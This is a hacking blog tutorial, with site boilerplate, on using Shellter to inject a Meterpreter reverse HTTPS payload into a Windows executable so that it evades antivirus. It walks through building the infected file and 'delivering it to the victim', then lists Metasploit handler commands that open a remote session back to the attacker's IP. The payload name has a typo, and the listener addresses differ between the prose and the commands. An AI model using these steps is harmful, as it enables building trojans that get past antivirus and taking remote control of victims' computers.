Bypassing antivirus programs using SHELLTER

Shellter is another antivirus evasion tool like veil-evasion framework, which infects the PE dynamically, can be used to inject the shell code into any 32-bit native Windows application. This framework enable us to either customize the payload or utilize the Metasploit framework in a sophisticated way. Most antivirus programs will not be able to identify the malicious executable, depending upon how the attackers re-encode endless number of signatures.



Shellter can be installed by running apt-get install shellter in the terminal of Kali Linux if you are not logged in as root user then use sudo apt-get install shellter. Once the application is installed, we can open Shellter by issuing shellter command in the terminal.
Now our objective is to create malicious executable file explained below in 7 steps:

  • Attackers should be given the option to select either Auto (A) or Manual (M) and help (H). I am going to use Auto mode.

  • Our 2nd step is to provide the PE target file; attackers can choose any exe file or utilize the executables in /usr/share/windows-binaries/.

  • AfterPE target file location is provided, Shellter will be able to disassemble the PE file.

  • In the end, Shellter will ask you to enable the stealth mode or not.

  • Post stealth mode selection, you will be able to inject the listed payloads to the same PE file.

  • I prefer meterpreter_reverse_HTTPS then provide the LHOST and LPORT.

  • Everything is fine all info is fed to Shellter, and the same PE file provided as input is now injected with the payload and the injection is complete.


After creation of file you can scan with any antivirus program to verify. Once this executable is delivered to the victim, sender will now be able to open up the listener as per the payload; in my example, LHOST is 192.168.1.242 and LPORT is 5244:

use exploit/multi/handler
set payload windows/meterpretere/reverse_HTTPS
set lhost 192.168.1.102
set lport 5544
set exitonsession false
exploit -j -z


To easily provoke the above commands you can save the preceding list of commands to a filename as listener.rc and run using Metasploit by running (msfconsole -r listener.rc). Once the victim opens the executable without being blocked by the antivirus or any security controls, it should open the tunnel to the attacker's IP without any trouble. :)



Thanks for reading now let me recommend you some other practical guides about penetration testing of Remote Access Protocols, Remote Desktop ProtocolSSH Network Protocol, Network RoutersWordpress website using WPSeku,

COMMENTS

Name

AC Milan,4,Arsenal,9,Atalanta,5,Atletico Madrid,6,Barcelona,15,Bayern München,6,Bundesliga,18,Business,1,Chelsea,13,Coronavirus,2,Cristiano Ronaldo,13,Dortmund,2,Ethical Hacking,46,Exploitation,35,FA Cup,2,Featured,215,Football,228,Footprinting,29,Google Adsense,2,Inter Milan,5,Juventus,15,Kali Linux,39,Kali NetHunter,3,LaLiga,39,Lazio,4,Leicester City,7,Ligue 1,26,Liverpool,12,Lyon,5,Make Money,3,Manchester City,15,Manchester United,14,Messi,2,Metasploit,1,Napoli,4,Offensive Security,17,Penetration Testing,15,Politics,2,Post Exploitation,19,Premier League,68,PSG,6,Real Madrid,13,Roma,3,Search Engine Optimization,4,Serie A,32,Sevilla,1,Sports,199,Technology,36,Tips,16,Tottenham Hotspur,10,Trending,443,UEFA Champions League,10,UEFA Europa League,11,United States,1,Windows,7,World News,7,
ltr
item
My Hack Stuff: Bypassing antivirus programs using SHELLTER
Bypassing antivirus programs using SHELLTER
My Hack Stuff
https://www.myhackstuff.com/2018/01/bypassing-antivirus-programs-using.html
https://www.myhackstuff.com/
https://www.myhackstuff.com/
https://www.myhackstuff.com/2018/01/bypassing-antivirus-programs-using.html
true
1336489415246004999
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content